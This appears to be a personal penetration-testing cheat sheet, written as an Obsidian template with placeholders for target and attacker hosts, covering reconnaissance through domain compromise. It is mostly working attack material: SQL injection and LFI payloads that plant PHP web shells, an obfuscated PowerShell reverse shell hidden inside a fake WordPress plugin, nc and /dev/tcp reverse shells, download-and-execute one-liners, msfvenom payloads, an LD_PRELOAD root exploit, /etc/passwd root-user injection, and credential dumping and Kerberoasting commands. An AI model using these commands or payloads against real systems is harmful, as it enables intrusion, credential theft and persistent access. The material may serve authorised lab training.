Template variables:
LHOST: <% tp.frontmatter["LHOST"] %>
RHOST: <% tp.frontmatter["RHOST"] %>
LPORT: <% tp.frontmatter["LPORT"] %>
RPORT: <% tp.frontmatter["RPORT"] %>
DOMAIN: <% tp.frontmatter["DOMAIN"] %>
USERNAME: <% tp.frontmatter["USERNAME"] %>
PASSWORD: <% tp.frontmatter["PASSWORD"] %>
HASH: <% tp.frontmatter["HASH"] %>
sudo nmap -sS -sV -sC -vv -T4 -Pn <% tp.frontmatter["RHOST"] %>
# FTP Vulnerability Scripts
nmap -p 21 --script ftp-* <% tp.frontmatter["RHOST"] %>
# Recon
nmap -sC -sV <% tp.frontmatter["RHOST"] %>
# Alive hosts
nmap -sn <% tp.frontmatter["RHOST"] %>/24
# scan the 1024 most common ports, run OS detection, run default nmap scripts
nmap -A -oA nmap <% tp.frontmatter["RHOST"] %>
# Scan more deeply, scan all 65535 ports on $<% tp.frontmatter["RHOST"] %> with a full connect scan
nmap -v -sT <% tp.frontmatter["RHOST"] %> -p-
# more options
nmap -sV -sC -v -A <% tp.frontmatter["RHOST"] %> -p-
nmap -sT -sV -A -O -v -p 1–65535 <% tp.frontmatter["RHOST"] %>
# scan for vulnerabilities with nmap
nmap --script "vuln" <% tp.frontmatter["RHOST"] %> -p139,445
# my preference
nmap -sV -sC -v -oA output <% tp.frontmatter["RHOST"] %>
nmap -p- -v <% tp.frontmatter["RHOST"] %>
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sS -sV -sC -vv -T4 -Pn $1
# you might want to change the port in the command below
for i in $(seq 1 254); do nc -zv -w 1 <% tp.frontmatter["RHOST"].split(".").slice(0, -1).join(".") %>.$i <% tp.frontmatter["RPORT"] %>; done
dnsrecon -d <% tp.frontmatter["RHOST"] %> -t axfr
# there is also a metasploit module enum_dns for that
nıkto -h <% tp.frontmatter["RHOST"] %>
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
# Windows Command Execution (RFI exploit)
# Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send
<?php echo shell_exec("nc.exe -nlvp <% tp.frontmatter["RPORT"] %> -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv <% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RPORT"] %>
# paths
http://<% tp.frontmatter["RHOST"] %>/wp-admin
http://<% tp.frontmatter["RHOST"] %>/wp-content/uploads/2017/10/file.png
wpscan --url http://<% tp.frontmatter["RHOST"] %> --log
wpscan --url http://<% tp.frontmatter["RHOST"] %> --enumerate u --log
wpscan --url http://<% tp.frontmatter["RHOST"] %> --wordlist wordlist.txt --username example_username
wpscan --url http://<% tp.frontmatter["RHOST"] %> --api-token WPSCAN_API_TOKEN -e u
An example with Windows encoded payload.
<?php
/**
* Plugin Name: Kekshell-wp
* Version: 1.0
* Author: Keks
* Author URI: http://venom.com
* License: None
*/
exec("powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA4ACIALAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=");
?>
TODO: CHECK
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w <wordlist> -x pdf -q
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirb/big.txt -p pattern
gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
ffuf -u http://mentorquotes.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.mentorquotes.htb'
# removes results by code 302
ffuf -u http://mentorquotes.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.mentorquotes.htb' -fc 302 -mc all
# removes results by size 26
ffuf -u 'http://vessel.htb/FUZZ' -w directory_2.3_medium_lowercase.txt -t 256 -fs 26
# basic html ntlm auth
hydra -L usernames.txt -p Changeme123 <% tp.frontmatter["RHOST"] %> http-get / -vvv
More info on: https://hashcat.net/wiki/doku.php?id=example_hashes
# NTLMv2-SSP Hash
hashcat -m 5600 hash.txt passwordlist.txt --force
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.revshells.com/
# Reverse
# on kali
nc -lvp <% tp.frontmatter["LPORT"] %>
# on victim
nc <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> –e /bin/bash
# nc mkfifo on victim
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> >/tmp/f
<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
# nc listeners
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/<% tp.frontmatter["LPORT"] %> 0>&1'");?>
<?php passthru("/bin/bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/<% tp.frontmatter["LPORT"] %> 0>&1'");?>
# Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters.
egrep '^[a-zA-Z0-9]{6,12}$' strings
# Emails:
egrep '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b' strings
egrep '^.+@.+\.com$' strings
# URLs:
egrep '^(http|https)://[a-zA-Z0-9./?=_%:-]*$' strings
egrep '^ĥttp(s)?.{3}(www)?.+\..+$' strings
# telnet or netcat connection
nc <% tp.frontmatter["RHOST"] %> 25
VRFY root
# Check for commands
nmap -script smtp-commands.nse <% tp.frontmatter["RHOST"] %>
# to find the public share
locate *nfs*.nse
nmap --script nfs-showmount.nse <% tp.frontmatter["RHOST"] %>
# mount the share to a folder under /tmp
mkdir /tmp/nfs
/sbin/mount.nfs <% tp.frontmatter["RHOST"] %>:/home/box /tmp/nfs
#Login
sqsh -S <% tp.frontmatter["RHOST"] %>:<port> -U sa -P password
# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go
# Crawl the links
sqlmap -u http://<% tp.frontmatter["RHOST"] %> --crawl=1
sqlmap -u http://<% tp.frontmatter["RHOST"] %> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
# Search for databases
sqlmap –u http://<% tp.frontmatter["RHOST"] %>/index.php?par= –dbs
# dump tables from database
sqlmap –u http://<% tp.frontmatter["RHOST"] %>/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://<% tp.frontmatter["RHOST"] %>/index.php?par= –dbs –D dbname –T tablename –-dump
# OS Shell
sqlmap -u http://<% tp.frontmatter["RHOST"] %>/comment.php?id=738 --dbms=mysql --osshell
# windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
# linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
# check for sqli vulnerability
?id=1'
# find the number of columns
?id=1 order by 9 -- -
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/#.php') ,6,7,8,9 -- -
# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -
# then go to browser and see if you can execute commands
http://<% tp.frontmatter["RHOST"] %>/shell.php?cmd=id
# Then use Pentest Monkey Reverse Shells to call your shell
# SQL Injection (manual)
photoalbum.php?id=1'
# find the number of columns
photoalbum.php?id=1 order by 8
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/#.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -
# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
# with responder running, we can get the ntlm hash
xp_dirtree "\\<% tp.frontmatter["LHOST"] %>\asdf"
# or we can get shell
EXECUTE xp_cmdshell 'whoami';
# for this, following options need to be set:
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
#!/usr/bin/python3
names = ["Keely Lyons", "Dax Santiago", "Sierra Frye", "Kyla Stewart", "Kaiara Spencer", "Dave Simpson", "Ben Thompson", "Chris Stewart"]
list = ["Administrator", "Guest"]
for name in names:
n1, n2 = name.split(' ')
list.append(n1)
list.append(n1+n2)
list.append(n1+"."+n2)
list.append(n1+n2[0])
list.append(n1+"."+n2[0])
list.append(n2[0]+n1)
list.append(n2[0]+"."+n1)
list.append(n2)
list.append(n2+n1)
list.append(n2+"."+n1)
list.append(n2+n1[0])
list.append(n2+"."+n1[0])
list.append(n1[0]+n2)
list.append(n1[0]+"."+n2)
for n in list:
print(n)
locate *rpc*.nse
nmap --script rpcinfo.nse <% tp.frontmatter["RHOST"] %> -p 111
# Port 111 - RPC
Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC:
rpcbind -p <% tp.frontmatter["RHOST"] %>
rpcinfo –p <% tp.frontmatter["RHOST"] %>
- Connect with a null-session (only works for older windows servers)
rpcclient -U <% tp.frontmatter["USERNAME"] %> <% tp.frontmatter["RHOST"] %>
rpcclient -U "" <% tp.frontmatter["RHOST"] %>
(press enter if asks for a password)
# in shell
srvinfo
enumdomusers
enumalsgroups domain
lookupnames administrators
querydominfo
enumdomusers
queryuser john
Also:
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>/tools/sysinternals/accesschk.exe kekchk.exe
PS> iwr -uri http://<% tp.frontmatter["LHOST"] %>/tools/windows-resources/offsecTools/Sharphound.ps1 -Outfile Sharphound.ps1
PS> IEX (New-Object Net.Webclient).downloadstring("<% tp.frontmatter["LHOST"] %>/tools/windows-resources/offsecTools/Sharphound.ps1")
# Local SMB
impacket-smbserver KEKSHARE .
impacket-smbserver KEKSHARE . -smb2support
# On victim
copy 20230530072946_BloodHound.zip \\<% tp.frontmatter["LHOST"] %>\KEKSHARE\20230530072946_BloodHound.zip
Msfvenom
#Linux
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f elf > shell.elf
# PHP
msfvenom -p php/reverse_php LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f raw > shell.php
# ASP
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f asp > shell.asp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f war > shell.war
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f raw > shell.jsp
# Exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=<% tp.frontmatter["LPORT"] %> -f exe -o shell_reverse.exe
use multi/manage/autoroute
set session 1
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j
Port 139 and 445 - SMB/Samba shares
Samba is a service that enables the user to share files with other machines
works the same as a command line FTP client, may browse files without even having credentials
# Check SMB vulnerabilities:
nmap --script=smb-check-vulns.nse <% tp.frontmatter["RHOST"] %> -p445
# basic nmap scripts to enumerate shares and OS discovery
nmap -p 139,445 <% tp.frontmatter["RHOST"] %>/24 --script smb-enum-shares.nse smb-os-discovery.nse
# enumarete with smb-shares, -a “do everything” option
enum4linux -a <% tp.frontmatter["RHOST"] %>
# learn the machine name and then enumerate with smbclient
nmblookup -A <% tp.frontmatter["RHOST"] %>
smbclient -L <server_name> -I <% tp.frontmatter["RHOST"] %>
smbclient -N -L //<% tp.frontmatter["RHOST"] %>
# list shares
smbclient --list <% tp.frontmatter["RHOST"] %>
smbclient -L <% tp.frontmatter["RHOST"] %>
smbclient -L //<% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password=<% tp.frontmatter["PASSWORD"] %>
smbclient //<% tp.frontmatter["RHOST"] %>/backup -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password=<% tp.frontmatter["PASSWORD"] %>
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\'Password Audit' -U <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> --password <% tp.frontmatter["PASSWORD"] %>
# Connect using Username
smbclient -L <% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["USERNAME"] %> -p 445
# Connect to Shares
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ShareName
smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ShareName -U <% tp.frontmatter["USERNAME"] %>
# anonymous lookup
smbmap -H <% tp.frontmatter["RHOST"] %>
smbmap -H <% tp.frontmatter["RHOST"] %> -u anonymous
smbmap -H <% tp.frontmatter["RHOST"] %> -u guest
smbmap -H <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %>
# recursive
smbmap -H <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %> -R
# curl with post data
curl -X POST --data 'Archive=git%3Brm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.119.161%20443%20%3E%2Ftmp%2Ff' http://<% tp.frontmatter["RHOST"] %>/archive
curl -v -X OPTIONS http://<% tp.frontmatter["RHOST"] %>/test/
curl --upload-file FILENAME -v --url http://<% tp.frontmatter["RHOST"] %>/test/ -0 --http1.0
# dns server
cat /etc/resdolv.conf
# network interface config
ifconfig -a
# network route
route
# trace route to target
traceroute -n RHOST
# arp cache
arp -a
# establishe tcp/udp ports/connections
netstat -auntp
ss -twurp
ss -tulpn
# current user info
id
# kernel info
uname -a
# recent logins
lastlog
# logged in users
last
# all users including uid and gid
for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user; done
# list all uid 0 (root) accounts
cat /etc/passwd | cut -f1,3,4 -d":" | grep "0:0" | cut -f1 -d":" | awk '{print $1}'
# passwd/shadow
cat /etc/passwd
cat /etc/shadow
# sudoers
sudo -l
cat /etc/sudoers
# read .bash_history
cat /root/.bash_history
# read other users .bash_history
find /home/* -name *.*history* -print 2> /dev/null
# OS
cat /etc/issue
cat /etc/*-release
# list all cron jobs
cat /etc/crontab && ls -als /etc/cron*
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
# list processes
ps auxwww
ps -u root
ps -u $USER
# SUID files
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# GUID
find / -perm -2000 -type f 2>/dev/null
# world writeable
find / -perm -2 -type f 2>/dev/null
# list conf files
ls -al /etc/*.conf
grep pass* /etc/*.conf
# open files
lsof -n
# process binaries, paths and permissions
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'
CRON LOGS:
grep "CRON" /var/log/syslog
export PATH=/sbin/:/usr/bin/:/bin/:/usr/bin/:$PATH
TTY Shell
/bin/bash -i
/usr/bin/script -qc /bin/bash /dev/null
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
# example 1
user: b3r
pw: toor
b3r:$1$QLI1P2ID$Zky7j7Yu5vL8agKreLuEL1:0:0:root:/root:/bin/bash
# example 2
echo root::0:0:root:/root:/bin/bash > /etc/passwd
su
# example 3
# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE
# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
# to switch to a root2
su root2
Password: mrcake
Also check: https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
// gcc -fPIC -shared -o lpe.so lpe.c -nostartfiles
// call
// sudo LD_PRELOAD=/tmp/lpe.so /opt/cleanup.sh
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
snmpwalk -v X -c public <% tp.frontmatter["RHOST"] %> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %>
onesixtyone -c snmp_default_pass.txt <% tp.frontmatter["RHOST"] %>
while read line; do
echo $line ; snmpbulkwalk -c $line -v2c <% tp.frontmatter["RHOST"] %> . 2>/dev/null | head -n 1
done < /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
# request processes
snmpbulkwalk -c internal -v2c <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.2
# command lines
snmpbulkwalk -c internal -v2c <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.5
# MD5 Wordpress
# write uname:hash in hashes.txt and then
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# RSA private key
ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
A fully working GCC with every compatible library:
STEP BY STEP GUIDE (you must have docker installed on Kali):
THE FOLLOWING LINES ARE ONE TIME ONLY. THESE LINES PULL THE OFFICIAL DEBIAN 10 CONTAINER AND CREATES A FOLDER IN YOUR (KALI) HOME DIRECTORY. THIS WILL BE THE SHARED FOLDER WHICH YOU CAN USE TO SHARE FILES BETWEEN THE CONTAINER AND KALI:
kali@kali:~$ docker pull debian:10
kali@kali:~$ mkdir ~/docker_shared
kali@kali:~$ docker run --name debian10 -v ~/docker_shared:/media -it debian:10 /bin/bash
root@e3edde4cb3e3:/# apt update && apt install gcc-multilib build-essential
FROM THIS POINT YOU CAN STOP/START YOUR CONTAINER FROM KALI WITH
kali@kali:~$ docker stop/start debian10
kali@kali:~$ docker exec -it debian10 /bin/bash
IF YOU WANT TO COMPILE YOUR CODE SIMPLY PUT THE C/C++ FILE INTO YOUR ~/docker_shared FOLDER AND USE gcc FROM THE /media FOLDER IN THE CONTAINER
# EMAIL SEND
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
# running nc as Admin
runas /user:Administrator "C:\Users\anirudh\nc.exe <% tp.frontmatter["LHOST"] %> <% tp.frontmatter["LPORT"] %> -e cmd"
xfreerdp /u:stephanie /d:corp.com /v:<% tp.frontmatter["RHOST"] %> /p:"LegmanTeamBenzoin\!\!" +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:alex /p:WelcomeToWinter0121 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
enum4linux <% tp.frontmatter["RHOST"] %> -A
# AlwaysInstallElevated :
msiexec /quiet /qn /i shell.msi
# AutoLogin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
route print
ipconfig /all
arp -a
netstat -ano
whoami
whoami /priv
whomai /groups
net user
# More on
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens
# Non-default services
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
# Checking which account service is running on
sc qc SERVICE_NAME
# Checking directory permissions
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
# SMB Auth
net use \\<% tp.frontmatter["RHOST"] %>\share /USER:user s3cureP@ssword
copy \\<% tp.frontmatter["RHOST"] %>\share\Wrapper.exe %TEMP%\wrapper-keks10k.exe
# SMB Disconnect
`net use \\<% tp.frontmatter["RHOST"] %>\share /del`
# More enumeration:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# Unquoted Service Paths:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
# filesearch
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.kdbx,*.log,*.xml,*.conf,*.config -File -Recurse -ErrorAction SilentlyContinue
# passwordsearch
findstr /si password= *.xml *.ini *.txt *.config *.log *.conf
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Restart-Service EnterpriseService
Cool tools to check out: https://github.com/411Hall/JAWS https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS https://github.com/PowerShellMafia/PowerSploit https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Also: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
# powercat command download and execute oneliner
IEX (New-Object System.Net.Webclient).DownloadString("http://<% tp.frontmatter["LHOST"] %>/powercat.ps1");powercat -c <% tp.frontmatter["LHOST"] %> -p <% tp.frontmatter["LPORT"] %> -e powershell
Adding user:
net user keks wlan08 /add
net localgroup Administrators keks /add
net localgroup "Remote Management Users" keks /add
See also https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962
BEST GROUP PERMISSIONS:
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
.\StandIn_v13_Net45.exe --gpo
.\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --acl
.\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --localadmin anirudh
gpupdate /force
# usually used as MITM to grab hashes of compromised machines
sudo responder -I tap0 -w -r
# OSCP - safe responder usage
sudo responder -A -I tap0
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-NetComputer
Get-NetComputer -ComputerName web04 | select operatingsystem,dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName files04
Get-NetSession -ComputerName files04 -Verbose
Get-NetComputer web04 | select dnshostname,operatingsystem,operatingsystemversion
Get-ObjectAcl -Identity stephanie
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
# impacket-smbclient
impacket-smbclient guest@dc.outdated.htb
use SHARE
# impacket-psexec
impacket-psexec test.local/john:password123@<% tp.frontmatter["RHOST"] %>
# impacket-secretsdump
impacket-secretsdump test.local/john:password123@<% tp.frontmatter["RHOST"] %>
# secretsdump NTDS.DIT and SYSTEM file
# getting the ntds.dit shadow copy
vshadow.exe -nw -p C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
impacket-secretsdump -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
# impacket kerberos , asrep roasting
impacket-GetNPUsers -dc-ip <% tp.frontmatter["RHOST"] %> -request -outputfile hashes.asreproast <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>
impacket-GetNPUsers -dc-ip <% tp.frontmatter["RHOST"] %> -request -outputfile hashes.asreproast -usersfile /root/validusersf.txt "<% tp.frontmatter["DOMAIN"] %>/"
hashcat --help | grep -i "Kerberos"
hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
# impacket kerberos , kerberoasting
impacket-GetUserSPNs -request -outputfile hashes.kerberoast -dc-ip <% tp.frontmatter["RHOST"] %> corp.com/jeff
